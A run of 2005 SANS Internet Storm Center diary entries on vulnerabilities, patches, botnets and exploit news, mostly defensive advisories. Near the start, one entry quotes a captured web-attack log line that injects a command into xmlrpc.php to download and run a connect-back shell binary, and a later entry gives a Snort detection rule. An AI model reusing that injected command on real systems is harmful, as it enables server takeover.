Safemode rootkit & DRM
F-Secure is also covering this in their blog.
PHP and phpBB releases
The first is about the new release of phpBB. This bulleting board system is very common and was target of some perl bots some time ago, due a vulnerability on its code. So, it is very important to keep up-to-date with the vendor.
The second one is the PHP itself. They just released a new version 4.4.1 and I would suggest you to keep up-to-date on this one too...
Today we received a post about some apache log entries regarding attempts to explore vulnerabilities on another php application, called xmlrpc.php. The entry was this one:
POST /wordpress/xmlrpc.php HTTP/1.1
<value><name>',''));echo '_begin_';echo `cd /tmp;wget xxx.xxx.255.44/cback;chmod +x cback;./cback xxx.xxx.227.194 8080`;echo '_end_';exit;/*</name></value></param></params></methodCall>
This looks like they were targeting a vulnerability on xmlrpc.php. And according their website the new releases fixes some security vulnerabilties."Note: all users are encouraged to upgarde to release 1.2 or later,since known exploits exist for earlier versions.All use of eval as a potential remote code execution exploit has been removed in release 1.2. More info on the vulnerabilities can be found at the bottom of the page."
Pedro Bueno ( pbueno //%// isc. sans. org)
Leap second: when time stands still
UTC TIME STEP
on the 1st of January 2006
A positive leap second will be introduced at the end of December 2005.
The sequence of dates of the UTC second markers will be:
2005 December 31, 23h 59m 59s
2005 December 31, 23h 59m 60s
2006 January 1, 0h 0m 0s
This is being done to keep time in sync with the slowing earth's rotation and the standard time measures in use in atomic clocks. There have been several leap seconds introduced since 1972.
My original source for this information is the November 2005 Scientific American article by Wendy Grossman. The impacts on information systems can come from GPS clocks not recognizing the leap second and sending out flawed or inaccurate data with can affect many time based functions including security features. According to the article there is talk within the INTERNATIONAL EARTH ROTATION AND REFERENCE SYSTEMS SERVICE (IERS) (a United Nations organization) of decoupling standard time measurement from the earth's rotation and adhering strictly to atomic decay.
NTP systems appear to be able to handle leap seconds: http://www.eecis.udel.edu/~mills/leap.html
Scientific American article here.
Happy travels through time ...
Dan at madjic dot net
(Another) AOL Pwstealer
Just a quick note about (another) one password stealer that we received today, focused on AOL. This one is not detected by any AV on Virustotal yet, althougth after I sent it to my personal AV list, some already answered that it will be included in the next signature's release.
This one had theÂ name of new_pict.exe , maybe trying to fool the person to click on an attachment file.
If you run this file you will get this screen asking for a screen name and password.
Pedro Bueno ( pbueno //%// isc. sans. org)
Email From Beyond - Tell us your own Halloween stories
I had known him for about 10 years when he died, too young, too soon. He was the President of our local School Board, I was the Vice President. We worked closely together on all of the topics and issues that face a School Board over the years. Even through the times when the cancer made it difficult for him to go on. He was that kind of man.
His name was John, and he was more than just my collegue... he was my friend.
He was also what I would call a computer nerd wannabe. He loved geneology and created incredibly detailed databases of his own designing. He was a sucker for the latest and greatest technology gizmos, and always had newer and cooler toys than me. But when things got beyond the world of his pre-packaged software, he was out of his depth. That's when I'd get a call.
I pulled more than a few viruses off of his machine, always leaving him with a gentle reminder about safe computer practices. But I could never get frustrated with him. The differences in our ages placed him squarely in the generation before me, and getting angry at him would be like getting angry at my dad... something that I just could never do.
The day that he died, I was both honored and terrified when his wife and daughter asked me to speak at his funeral. What would I say? How could I possibly sum up a life?
The funeral was to be in three days, and for two of those days I spent my time gathering facts about his life: his years of service at his job, his family history, his years on the School Board. On the night before the funeral, I sat down at my laptop and stared at a blank Word document, trying to decide where to begin.
I wrote. I wrote for about two hours, putting down a listing of accomplishments, accolades, and achieviements. With each new item that I listed, a weight seemed to press down on me, more and more. It just wasn't right.
Then, as I sat there looking at what I had written, the sound of a chime indicated that I had received a new email message. I switched over to my email program and was incredibly startled to see that I had received an email message from, of all people, John.
The subject line read: "Thank you"
I flipped back over to Word, and opened a new document. In about twenty minutes, I'd written a new eulogy with a very simple subject: "Thank you." Thank you for all that you were. Thank you for the difference you made. Thank you for being you.
Although I never actually opened the email, I didn't need to look into the situation too closely to know what had happened. One of the subject lines used by Netsky when it forged virus-laden email messages was "Thank you."
I still have that message, unopened, at the bottom of my in-box.
DST Cisco Surprise
Don's Halloween Trick
SANS offering TREATS too.
Survey: Information Security Career Advancement Survey now available.
Complete the survey by November 10 to receive a copy of the results.
Sweet Treats from the Honeynet group.
release of mwcollect v3.0.0 on http://www.mwcollect.org/ .
Mwcollect is a distributed malware collector network. A mwcollect network is composed of 1 or more mwcollectd sensors; an optional database to store collected binaries and optional redirect servers that send specific ports towards the mwcollectd sensors. Mwcollectd sensors simulate vulnerable services to spreading malware and thus that malware tries to exploit these services. The mwcollectd daemon then parses the exploit packets, searches them for the shellcode, interprets the shellcode, and then takes further actions to download the malware. The malware can then be submitted into a database or stored on the local filesystem. The redirect servers act as NATTed gateways to forward specific ports to the mwcollectd servers. This provides greater IP address space coverage with fewer full-blown mwcollectd servers.
The core has been completely rewritten. It is now even more modularized
and has proven to be very stable. Integration of libCURL for http/ftp
downloads is now threaded and therefore does not result in an increased
CPU usage. Mwcollect v3.0.0 is much more suited for future extensions
and is the important step from the proof of concept that v2.x.x was to a
real mature product. Mwcollect is now licensed under the GPL, (c) by
You can download a compressed .tar.bz2 source package from
Microsoft attacks Zombi Masters.
Microsoft said it has filed "John Doe" lawsuits against the operators of 13 spam organizations that use illegal "zombie" computers to send their spam. The company held a press conference today with officials from the Federal Trade Commission to announce the lawsuits, filed in Washington State's King Country court on August 17.
From an interview with Tim Cranton http://spamkings.oreilly.com/cranton.mp3
Microsoft has taken a new approach to security in particular in the enforcement side. They took a clean computer. Infected it with a common malicious code. That code turned the computer into a Spam zombie. A Spam zombie is a computer that is connected to the Internet that has been infected and checks in with the zombie controllers to let them tell it what to do. Microsoft documented 5 Million connections used to send over 18 million Spam messages in less then 3 weeks. This was just one computer. There are reported to be thousands of Spam zombies out there. Microsoft cordoned their Spam zombie off the net so it could not be used to actually send the Spam. Microsoft filed a lawsuit and contacted ISP's to try to discover who is really sending the Spam.
The SANS news bites letter has additional information on this.
Reminder: Daylight Savings Ends Sunday At 02:00
Incident Handling: Home Heating 101
Several days ago it finally got cold enough in Virginia to require using the furnace to heat the house so we flipped the switch on the thermostat from Cool to Heat. The furnace worked fine and we had whole-house heat for a couple of days. Two days ago I came home and the house was cold. I checked the circuit breaker in the electric panel and it wasn't tripped. I checked the light in the utility room (same circuit as the furnace) and it wouldn't come on. Changed the light bulb -- no joy. Flipped the circuit breaker off and back on -- no joy. I went back upstairs to think of other ideas to try before calling an HVAC contractor when all of a sudden, a few minutes later the furnace turned on and started working just fine.
The furnace ran that evening and into the night but sometime early in the morning, it stopped working again. I called an electrician and got someone to come out a take a look at it that afternoon. He started with the furnace. It seemed ok. Tested the new light bulb -- it was good. Tested the light socket and was suprised to get a voltage reading on the neutral wire.
So he went to the main electric panel for the house, removed the panel cover to expose the wiring connections to the circuit breakers and nuetral bars and found quite a suprise. Instead of one neutral wire for each circuit being secured by one lockdown screw on the neutral bar, there were a number of instances of two or three wires under one screw. In the case of the furnace circuit, there were four wires under one screw. The screws were loose so the wires had been intermittently shorting and sparking. Had lots of nice black soot from the arcing in there. He was really "shocked" at the condition of the wiring in there -- no way it could have passed an inspection as it was. He rewired the box correctly and the furnace works fine now.
So in this incident, it appeared that the problem was with the furnace since the air handler had been working fine for months cooling air and just shortly after starting to use the furnace for heat was when we had problems. But it turned out to be an external component (the electrical circuit) that the furnace depended on.
How does this relate to information security? Well, similar incidents can occur. If we get alerted that a system on our network has been compromised, the first place our attention is usually directed is to the compromised system and then perhaps the firewall to ensure to we are only allowing the appropriate access. We may need to look elsewhere on our network to find the cause of the problem or the access vector that open. Perhaps someone has added a wireless access point or has a dialin modem attached to a workstation. Oftentimes we need to look beyond the immediate likely cause to look for the actual cause.
Have a safe weekend and Happy Halloween Monday night. It looks like its supposed to be dry and cold here so I'm glad my furnace works now.
Botnet Malware code modifier's competition continues
"HellBot3 have BackDoor in 'HellMsn.h'. The HellBot3 author is an idiot!!!
Play with The best, Die like the rest."
Sheesh, upon reflection, the strings above make me miss Gobbles, whose flames rank right up there as all-time classics.
"It may be possible to make Ethereal crash, use up available memory, or run arbitrary code by injecting a purposefully malformed packet onto the wire or by convincing someone to read a malformed packet trace file."
The IDefense advisory is at: www.idefense.com/application/poi/display?id=323&type=vulnerabilities
There is exploit code for at least one of the BOF vulns. Now, who uses Ethereal, anyway? Net admins, incident handlers, auditors, analysts....nothing important to worry about on their systems, eh?
A great way to avoid getting bitten badly by these protocol parser attacks is to not run them as a super user, if you don't have to. Do your packet capturing with something dumb (like tethereal or tcpdump with the -w switch), then analyze as a non-priv user. This way an attacker is limited in the damage that can be done, should they slide the evil bits into your sniffer.
Escaping the P2P-induced alert onslaught
Defeating A/V by inserting forged data
An Assessment of the Oracle Password Hashing Algorithm
The authors findings indicates that the password hashing algorithm is weak, and subject to a number of attacks. If an attacker is able to obtain Oracle password hash information from a compromised system, hrough traffic sniffing, SQL injection or other attack vectors, they will likely be able to recover plaintext passwords with few resources, even when strong passwords are selected. The paper also recommendsseveral actions Oracle DBA's can take to help mitigate this threat.
The SANS Institute contacted the Oracle product security team about these findings on 7/12/2005. Subsequent requests for clarification on what Oracle plans to do to address these vulnerabilities have gone unanswered. Oracle customers are encouraged to communicate their desire to resolve these vulnerabilities through the appropriate channels.
New Skype vulnerabilities
CVE entries: CVE-2005-3265
Secunia advisory: http://secunia.com/advisories/17305/
Please upgrade to the new version ASAP, they have been rated highly critical by Secunia, and high by Skype.
Download here: http://www.skype.com/download/
Adrien de Beaupre
Exploit for Snort BO available!
Our good reader Juha-Matti sent a note about an exploit published by FrSIRT, formely known as K-Otik.
On the good side, our Handler Kyle Haugsness created a tool and some snort signatures that can detect them!
I just tested it against the exploit and it really works! ;-) You can find it here .
If you didnt patch yet or applied the workarounds, do you need more reasons?
Is hurricane Wilma affecting you?
We've recently received an additional report that mentioned "I've not been able to reach any of my sites hosted there since about 0830 EDT. " Thanks Fred!
UDP traffic to port 50368
Here a quick sample of sources and source ports
No idea what's causing that. We have almost no other traffic to this port in our database. If you see any outbound traffic like that, let us know.
deja vu - "25 new unpackers added in one week"
Yup, that's 25 new unpackers in one week, and there's other "deja vu" data at Kaspersky.
And Websense published a whitepaper of the "JS/Wonka" encoding technique.
A new botnet - Mocbot
This botnet client has been spread using the MS05-047 vulnerability, continues their entry.
McAfee has information at:
This is a heads up for some since botnet owners are using it to further exploit networks they already have a presence on. If you haven't already patched - you may want to do so now.
According to McAfee and F-Secure, they have amended that this botnet is exploiting MS05-039 instead of MS05-047.
Stopping Spam by Extrusion Detection
This is an excellent article by Richard Clayton, University of Cambridge in the UK. I am very intrigued by the information that was supplied in this article. Richard has provided some very helpful tips. Thanks Chris for bringing this to our attention.
Exploit circulating for newly patched Oracle bug
Those of you who use Oracle may want to take a look at the article and consider getting your systems patched.
Possible Problem with MS05-050 Patch
According to the Microsoft, this only applies to:
• You are running Microsoft Windows 2000
• Microsoft DirectX 8.0 or DirectX 9.0 is installed on the computer
This is likely due to the incorrect patch that you have manually downloaded and installed. If you have installed using Microsoft Windows Update website, you should be protected and free from this problem.
To check whether your system is correctly updated, you can verify the version number of Quartz.dll. The steps are detailed in Microsoft KB article 909596.
Exploit Code for MS05-047
Snort signature and standalone detection tool
Here's the Snort signature. Don't forget to turn off the BO pre-processor in snort.conf if you are running a vulnerable version! Also, don't forget to change the "sid" field below...
alert udp any !31337 <> any !31337 ( \
msg: "BLEEDING-EDGE EXPLOIT Snort Back Orifice pre-processor buffer overflow attempt"; \
dsize: >1024; \
content:"|ce 63 d1 d2 16 e7 13 cf|"; \
offset: 0; \
depth: 8; \
threshold: type limit, track by_dst, count 1, seconds 60; \
classtype: attempted-admin; \
sid: 3000001; \
Outage on Verio and Level3
Big Honkin' Botnet - 1.5 Million!
"The botnet in the spotlight by the Dutch National Criminal Investigation unit in the Netherlands, about two weeks ago was found to comprise approximately 1.5 million hacked computers (instead of 100k reported earlier) . This has been discovered by GovCert.nl, the Dutch Computer Emercency Response Team, while dismantling the network of computers infected with a Trojan Horse. Of the total number of infected computers, it was estimated that only 30,000 were located in the Netherlands.
The court of Breda has decided to keep the 19-year old suspect as well as a companion, in custody. This companion is suspected of being responsible for a so-called Denial of Service (DoS) attack after an extortion attempt of a US-based company. Earlier on in the investigation both of them were suspected of being involved in another DoS attack of a US based company.
More arrests related to this investigation are anticipated."
Woohoo! Bad guys in jail. You gotta love that.
From a trend perspective, I've been noting two things, which I've also heard fellow handler that I call Ekim Roop mention. We're seeing some smaller botnets, which are more highly differentiated (that is, a single bad guy might have three or four botnets, each doing one element of a given crime. One set of bots for spamming, another for a distributed web site for phishing, and another to obscure surfing through proxying.) At the same time, we're also seeing some very vast botnets, this time over a million. We may even go higher than that in the future.
Scary stuff. Keep fighting the good fight, dear readers. We must.
Over and out--
Sploits Du Jour: Veritas NetBackup & Ethereal. Watch Oracle and Snort!
In particular, patch Veritas NetBackup (more info here). Working exploits have been released.
Also, patch Ethereal (more info here). Again, working exploits are available.
Also, as we said the other day, don't forget to check out the crucial Oracle patches.
And, for goodness sakes, patch Snort or shut off the Back Orifice preprocessor! A fully working exploit is likely very near.
Also, a kind reader emphasized the importance of hardening systems today, in light of this Snort vulnerability, mentioning the great Grsecurity package for Linux, as well as the importance of chroot environments. Also, this reader requesting anonymity points out that the Stack-Smash-Protector (SSP) extensions for gcc from IBM makes it harder to exploit buffer overflows, and can be compiled into various executables. It's essentially an update of the venerable StackGuard tool, but more carefully integrated with the compiler itself. As we say in Jersey... "Noice".
Fraud: Evil People Doing Evil Things
Back to Green on the Snort BO Buffer Overflow
Snort BO status update
When this vulnerability was announced yesterday, I was curious to see how difficult this would be to exploit due to the widespread nature of Snort. After doing a little research on the encryption method in Back Orifice, I was able to develop working exploit code in 2 hours. Bad news!! Of course, we aren't in the business of releasing exploits, so this code is staying private. Now, it appears that HD Moore is very close to having exploit code working as a plugin to metasploit. If we haven't said it loudly enough already, PLEASE UPGRADE your Snort sensors or disable the BO pre-processor if running the vulnerable versions of Snort 2.4 series. I checked the 2.3.2 source tree today and it is not vulnerable.
How about defensive measures? If you are running Snort and are able to upgrade, then the new version should detect the exploit attempt. But I am working on two additional defensive tools. The first is a Snort signature that should catch the exploit attempt. This should be available real soon now (tm).
The second tool may prove to be much more valuable. This tool is necessary because of the fact that the exploit can be triggered on any UDP port (except 31337) and that all Back Orifice traffic is encrypted. I don't want to give away more information at this point, since it will help the exploit writers. The tool is a standalone program that utilizes libpcap to sniff traffic and decode UDP traffic looking for the exploit. It will be useful to folks that can't upgrade their Snort daemon to get the new detection it provides, but still want to see if they are being attacked. Secondly, this will be useful to people running a different IDS system that can't decode the Back Orifice encryption. Third, it will probably be very useful in identifying a global worm outbreak.
Since time is of the essence here, I am hoping to have this tool available very shortly. It will require libpcap and is being developed on Debian Linux. It will not require Snort to be running. Since code portability isn't my strong suit, we may be looking for people to test and port the code to FreeBSD, Solaris, etc. Please drop us an e-mail if you would be willing to help in this area. The source code is currently about 800 lines.
Oracle Critical Patch Update and Security Alert
vulnerabilities. The impacts of these vulnerabilities include unauthenticated, remote code execution, information disclosure, and denial of service.
Oracle released a Critical Patch Update in October 2005 which addresses more than eighty vulnerabilities in different Oracle products and components.
Oracle Critical Patch Update and Security Alert
Infocon Yellow: Snort BO Vulnerability
You have a problem if you run Snort Version 2.4 (other then 2.4.3), and if you have the 'bo' preprocessor enabled.
Why do we think this is a big deal:
- The exploit is rather easy to write. Yes, its specific to a particular binary, but there are a number of common binaries deployed in large numbers.
- It uses a single UDP packet, which can lead to very fast spreading worms.
- The UDP packet can be spoofed, and can use any port combination.
- Snort is very popular. A fast spreading (noisy) UDP worm could lead to local slowdowns/outages.
Snort before version 2.4 is not vulnerable. Neither is any Snort install that does not have the bo preprocessor enabled.
Please let us know if you see exploits posted, or have other details to share. We expect to stay on 'yellow' for about 12-24 hrs unless there are any new developments.
Snort BO pre-processor Vulnerability
As an immediate step, disable the BO preprocessor, by commenting out this line:
# preprocessor bo
this should eliminate the issue, and these days, Back Orfice is not all that much of a threat compared to other trojan/bots. You should also consider upgrading to Snort 2.4.3, which will fix the issue.
MS05-051 exploit spotted
Trend Micro states that the malware was written in Visual Basic, which usually indicates some low skilled bot-kid. Kind of odd to see it surface this way, but having it included as a new warhead in existing malware matches past patterns.
We will update this diary as we learn more.
GPL Nessus Forks
In case you have missed the announcement, Tenable security has made the decision of commercializing the popular Nessus security scanner within the next month.
As a result, a project group has been formed to release a GPL fork of the Nessus security scanner in the future. This product will probably undergo a name change to prevent problems with support between the commercial scanner and the new GPL fork. In the meantime, it is located at http://www.gnessus.org/doku.php .
Additionally, Handler Kevin Liston noted that another GPL nessus project is located at http://porz-wahn.berlios.de/homepage/about.php .
Handler on Duty
Entertaining Bug in Microsoft Word
For those thinking "Where is the security implication of this?",Â take this as an editorial on software complexity and its connection to security flaws.Â Â As software has become more complex, we have seen more and more security flaws found.Â Simple enough, right? To restate it a little differently, software complexity and flaws detected are directly related. This may not always stay the case, but that is common wisdom in today's world.Â (Side note:Â This is not a gripe against Microsoft and should not be read in that light.Â This is just as relevant to any software vender.)Â
In this increasingly complex software, how many flaws are there which have remained undetected for years? How many very simple oversights, like the one above, exist in more sensitive modules with security ramifications?Â How long can a minor flaw stay undetected in popular software packages?Â
To me, this is a very sobering thought, especially considering the number of ecommerce or medical sites on the Internet today.Â Somehow, I will not let it make me loose sleep over the (in)security of my private information on the Internet.
For those that have a large amount of copious spare time,Â feel free to send in other single-word examples of the above to our attention. Hyphenated words are troublesome to native speakers much less computers.Â If you find any words, please also submit what version of Word exhibited this issue.Â We will try to find an appropriate contact within Microsoft to send the examples.
Pedro's Malware Analysis Quiz
Handler on Duty
Possible Patch Problems
A number of people have reported weird problems with one of the MS patches released yesterday, specifically MS05-051 Vulnerabilities in MSDTC and COM+ Could Allow Remote Code Execution (902400).
Symptoms include, but are not limited to:
- Inability to visit Windows Update
- Inablility to use the Search tool off the Start Menu
- blank screen (no icons) upon login
- Symantec LiveUpdate stops working
- SpySweeper stops working
- problems with Office apps
- VirtualPC becomes extremely sluggish
Lee said he had spoken to a Microsoft engineer about this. From what he could tell:
"this issue is only affecting people with very specific NTFS permissions. If the C:WinntRegistration folder is locked down and cannot be written to by COM+ you will have errors similar to those listed in your alert. All of those tasks use COM+ in one way or another."
Another perspective from Microsoft:
'The solution will be available at http://support.microsoft.com/?id=909444,
and will be linked to from the MS05-051 bulletin - hopefully within the
hour. Feel free to communicate the cacls solution to anyone you come across
until then. This is not a "known issue" or "problem" with the patch, but a
"complexity with the increased security provided by the patch when running
on systems where settings have been incorrectly changed from the default
Uninstalling patch 902400 seems to do the trick for most folks. You may need to check the "Show Updates" box under Add/Remove Programs to see the hotfixes. The better answer is calling Microsoft directly; this should be a free call if the issue is problems with a patch. The US number is 866-727-2338. Outside of the US, see http://support.microsoft.com/common/international.aspx?rdpath=4 .
Now this week started in a very similar way, with a large number of microsoft patches. In particular the MS DTC vulnerability (MS05-051) has a lot of promisse. Like the PnP vulnerability used for Zotob, it could target Win2k quite efficiently. At this point, the only thing missing is a widely available exploit, but given that there are a number of private/commercial exploits, a public one is probably right around the corner.
So what should you do today before you head home for the weekend:
The obvious thing is to apply patch MS05-051 on at least your Win2k systems. We do know the port 3372 scanning started in full force, likely in order to acquire target lists. If you can't patch, at least make sure port 3372 is closed. Windows 2000 does not come with its own host based firewall. But you can use IPSec policies to acchive the same effect. See this paper by David Taylor for details.
What will happen this weekend? I invited other handlers to add their own opinions/predications to this story. In my opinion, we will not see widespread exploits. This can change quickly, but is also dangerous in its own way. Zotob showed very nicely how an exploit will not get too much attention until it hits a couple of high profile targets. The scenario I am most afraid of is the use of an exploit by a small group to attack high value targets. Remember the "russian key logger" episode (Berbew)? A group exploited a number of well known web sites using the IIS ssl vulnerability, and came back months later to plant an Internet Explorer exploit. We are "ripe" for a repeat of this scenario, in particular the rich selection of new client exploits released.
What should you do this weekend? Stay close to your pager. In particular, don't consider yourself safe as long as CNN isn't reporting about it. Make sure your IDS is setup with MS05-051 signatures, see if you can just log all port 3372 traffic. Use the rest of today to collect some data so you have a baseline if things turn bad. I don't like to recommend to turn systems off. but well, there is nothing more secure then a system diconnected from power.
Please use our forum to share your own opinions and predictions.
FrSIRT exploits for MS05-044, MS05-045, and MS05-048
Microsoft Collaboration Data Objects Buffer Overflow PoC Exploit (MS05-048)
Microsoft Windows Network Connection Manager Local DoS Exploit (MS05-045)
Microsoft Windows FTP Client File Location Tampering Exploit (MS05-044)
Many thanks to John Otterson and Eric Griswold for noticing this.
Increased activity on TCP port 5250
If you have captures of any of this traffic, please upload them via the contact page. Thanks in advance.
MS05-044 Folder View for FTP Sites - mailbag item
Well, Microsoft makes "Folder View for FTP Sites" a complex subject and certainly one I may be able to post "Workaround" information on in a Diary post.
AFAICT there are many variables involved in OS and IE "installation" (oem settings, etc) that can affect FTP Folder views. I did read a ton of MS KB's and the two best on the specific issue are referenced below. And I really appreciate your polite persistence in pushing me to read up on this important item. Thank you!.
You're right that MS is misleading in it's Security Bulletin presentation. Because so many factors like OEM and customer installation settings can enable the FTP folder view the Security Bulletin should state a clear workaround on how to look for it in IE advanced tab and clearly state that you can disable it by unchecking/clearing it.
In the bulletin, in the "Mitigating Factors for FTP Client Vulnerability - CAN-2005-2126:" section MS says;
"By default, the "Enable Folder View for FTP Sites" Internet Explorer setting is disabled on all affected operating system versions. An attacker would only be successful if the user manually enables the "Enable Folder View for FTP Sites" Internet Explorer setting on the affected system." This is clearly misleading!
And in the "Workarounds for FTP Client Vulnerability - CAN-2005-2126:" section they only say "Do not download files from un-trusted FTP servers" when they should ADD;
"YOU CAN DISABLE FTP FOLDER VIEW;
To disable FTP Folders, follow these steps:
1. Click Start, point to Settings, click Control Panel, and then double-click Internet Options.
2. Click the Advanced tab.
3. Under Browsing, to disable FTP Folders, CLEAR/UNCHECK the Use Web Based FTP or Enable Folder View for FTP sites check box.
NOTE: When you CLEAR/UNCHECK the Use Web Based FTP or Enable Folder View for FTP sites check box, you are disabling FTP Folder functionality.
So let me try and work something up on that end and see if I can get it into the diary.
No option to install Web Folders when you install Internet Explorer 6
Article ID : 298637
Last Review : June 20, 2005
Revision : 5.0
How to Install and Use FTP Folders
Article ID : 217888
Last Review : September 28, 2004
Revision : 3.1
MS05-051 exploit info and rumors
In addition we're seeing reports of non-specific exploit warnings from managed security service providers to their customers. And some rumors.
McAfee Vulnerability Information says that they have protection against exploits of MS Vulnerability MS05-051, "Entercept's Generic Buffer Overflow Protection protects against code execution that may result from exploiting this vulnerability."
ISS says they have protection out for an exploit, it's announcement is here.
NFR says they have protection out for an exploit. their announcement is here.
Here's some pre-vuln announcement facts, see the DShield data on Port 3372 scanning, ymmv.
We'll post anything else that's specific and critical when we get it.
24 BEA WebLogic Vulnerabilities and Security Issues
Belated "deja vu" - IR for rootkits that run in safe mode
Since I then knew of only 2 haxdoor versions which create the SAFEMODE cleaning issue (flattening is still preferred here), and since this cleaning issue doesn't seem to have created any significant AV Vendor issues in the middle of this years malware fe$tival, I dropped a line to some AV acquaintences about IR response problems these two variants create.
To make a long story short, F-Secure took a look at the second "safe mode" variant and said "Yes, this variant uses the similair registry keys/values. Haxdoor indeed does run in safemode. Symantec's recommendation about recovery console is probably the easiest way to delete haxdoor without any special tools. F-secure Blacklight also can identify and rename haxdoor's files. So I'd recommend users to try that first. It is far easier to use than recovery console."
And if your AV vendor does or does not address this issue, please drop me a line. Thanks!
Also, thanks very much Lorna, Tom and Jarkko!.
F-Secure BlackLight Beta
Symantec Backdoor.Haxdoor.E, "Discovered on: August 01, 2005"
Tom's analysis mentioning the second variant is in the Handler's Diary September 22nd 2005, see Follow the Bouncing Malware IX: eGOLDFINGER
Autoruns updated October 6th
The previous registry value length problem was covered by Handler Daniel Wesemann, with many reader contributions, in Nasty Games of Hide and Seek in the Registry
VERITAS NetBackup Vulnerability - remote
"The vulnerable daemon listens on port 13722 on both NetBackup servers and clients."
NetBackup 4.5, all versions, all platforms.
NetBackup 5.0, all versions, all platforms.
NetBackup 5.1, all versions, all platforms.
NetBackup 6.0, all versions, all platforms.
Their suggested workaround;
Block external network access on TCP port 13722
Symantec's version of the vulnerability announcement - VERITAS NetBackup: Java User-Interface, format string vulnerability
Black Tuesday Summary
|MS05-045||N/A||Moderate||Denial of Service|
|MS05-046||N/A||Important||Remote Code Execution|
|MS05-047||MS05-039||Important||Remote Code Execution and Local Elevation of Privilege |
|MS05-048||N/A||Important||Remote Code Execution|
|MS05-049|| MS05-016, MS05-024
||Important||Remote Code Execution|
|MS05-050||MS05-030||Critical||Remote Code Execution|
|MS05-051|| MS05-010, MS05-026, MS05-039, MS05-012, MS04-012
||Critical||Remote Code Execution|
|MS05-052|| MS05-037, MS05-038
||Critical||Remote Code Execution|
MS05-049 Windows Shell Vulnerability
Impact: Remote Code Execution
Supercedes: MS05-016 and MS05-024
This bulletin has three Parts to it.
Shell Vulnerability- CAN-2005-2122: A vulnerablity exist in the way that Windows handles the .lnk file extention. A .lnk file is a file that is a shortcut which points to another file and can contain properties that are passed on to the file that it is pointing to. As such, an attacker an attacker taking advantage of this would be able to execute code on the victim's system by getting the victim to open the .lnk file.
Shell Vulnerability - CAN-2005-2118: Same information as above. The main difference appears that instead of opening the .lnk file, the victim only needs to view the properties of the .lnk file.
Web View Script Injection Vulnerability - CAN-2005-2117: This vulnerability deals with Web View format used my Microsoft Explorer to view files and their information. A vulnerability exists in the way that Microsoft handles the validation of HTML characters within certain fields on the files. A attacker taking advantage of this
would be able to take complete control of the victim's system if the vicitim views the malicious file with the Web View format turned on in Explorer.
MS05-046 Client Service for NetWare Vulnerability
The update "resolves a newly-discovered, privately-reported vulnerability", MS rates it Important, and MS says update at your "earliest opportunity".
I rate it "Critical", test and deploy this update ASAP. One reason is that Microsoft notes "CSNW is commonly associated with the Internetwork Packet Exchange (IPX) and Sequenced Packet Exchange (SPX) protocols. However, CSNW could be exploited by using any installed protocol".
In the MS list of workarounds, one reasonable workaround is "Block TCP ports 139 and 445 at the firewall" and "use a personal firewall". An unreasonable workaround is that MS says you can remove CSNW.
CVE CAN-2005-1985 is "(under review)" and "Reserved" so far.
NOT AFFECTED - Microsoft Windows XP Professional x64 Edition, Windows Server 2003 for Itanium-based Systems, Windows Server 2003 with SP1 for Itanium-based Systems, Windows Server 2003 x64 Edition, Windows 98, Windows 98 Second Edition (SE), and Windows Millennium Edition (ME).
MS05-044 Windows FTP Client File Transfer Location Tampering
MS05-044 Vulnerability in the Windows FTP Client Could Allow File Transfer Location Tampering
This bulletin and related patch resolves a newly discovered public vulnerability. The flaw exists in the Windows FTP Client on Windows 2000SP4 (with IE 6 SP1), XP SP1 and Windows Server 2003 computers. An attacker can exploit the flaw to tamper with the file transfer location on the client during an FTP file transfer session. When a client has manually chosen to transfer a file via FTP on affected systems, the attacker can redirect the storage location to a location such as the Startup Folder. In general, if you do not download files from un-trusted FTP (or any other servers) then you really won't have a problem. Unfortunately, most end users are too trusting of links on the web and email and can be exploited in a few situation.
Per Microsoft, the vulnerability is mitigated in 3 ways.
1) "The attacker would have to successful persuade end users to visit an FTP server hosting files with specially-crafted file names" and would not have a way to forcing the files to be transferred. This would require our end-users to interact with dialog boxes and click on links without concern.
2) If the file of the same name already exists in this alternate location, then an "Overwrite File" warning message will be presented. If end users click through the dialog box, then it will go ahead and overwrite the file.
3) If the Internet Explorer setting "Enable Folder View for FTP Sites" is changed from the default disabled state, then the attack will be successful.
MS05-051 Vulnerabilities in MSDTC and COM+
MS05-051-A: MSDTC Vulnerability
MSDTC stands for "Microsoft Distributed Transaction Coordinator". This facilities allows programmers to combine updates send to several programs or systems into a "Transaction". This ensures consistency across several applications.
This vulnerability is particularly serious for Windows 2000. In the case of Windows 2000, a remote user may trigger the vulnerability without having to log in. For Windows 2k3 and XP, a user would have to log in first.
Either way, an exploit for this vulnerability would provide full system access. One of the other non-system vulnerabilities could leverage the MSDTC problem to gain full system access.
As a quick workaround, you should disable the network access to DTC. See
this MSDN Article for details. Even if you patch, you should still disable remote access to DTC if you don't need it.
Quick notes to disabled DTC:
sc stop MSDTC & sc config MSDTC start= disabled
Eeye discovered the vulnerability and provided a cookbook to write an exploit as part of its advisory. Shouldn't take too long to see this exploited.
Additional information about this vulnerability has been published by iDefense, available at http://www.idefense.com/application/poi/display?id=319
MS05-051-B: COM+ Vulnerability
COM+ is used to allocate resources to applications. By keeping for example connection pools and allocating connections as needed to processed, programs will be able to run faster as they do not have to initiate a new connection each time.
On Win2k and XP-SP1, an attacker can use this vulnerability to remotely obtain administrator privileges without having to authenticate. On XP-SP2 and Win2k3, this vulnerability can only be used to escalate privileges of a local authenticated user.
Standard firewalling procedures (UDP 135,137,138,445 and TCP 135,139,445,593) can help mitigate the vulnerability. However, if you have COM Internet services enabled, or RPC over HTTP, you will also have to firewall port 80 and 443.
Patching this vulnerability is critical for Win2k users. XP-SP1 users should patch and update to SP2 if possible. You may also want to consider disabling DCOM in addition to patching. See the MSFT bulletin for details.
MS05-051-C: TIP Vulnerability and Distributed TIP Vulnerability
CVE: CAN-2005-1979, CAN-2005-1980
The Transaction Internet Protocol ('TIP') is used by MSDTC (see MS05-051-A) to interface with other transaction managers. The particular vulnerability discussed here is a denial of service vulnerability which will cause TIP to seize responding if a particular crafted message is received.
Additional information about this vulnerability has been published by iDefense, available at http://www.idefense.com/application/poi/display?id=320
MS05-045: Network connection Manager DoS
The Network Connection Manager is used to manage different network connections (e.g. LAN, Dialup ...). A special crafted packet send to a connection can cause the Netowrk Connection Manager to die. However, it will restart once a new request is received.
Not much of a vulnerability. Requires an already authenticated (=connected) user and impact appears to be minimal. The latest versions of Windows are not vulnerable (XP-SP2, Win2k3 SP1). However, older and still popular versions are (like XP-SP1, Win2k3 pre-SP1, Win2k).
Firewall best practices can be used to mitigate the issue.
MS05-047 Vulnerability in PnP Could Allow Remote Code Execution
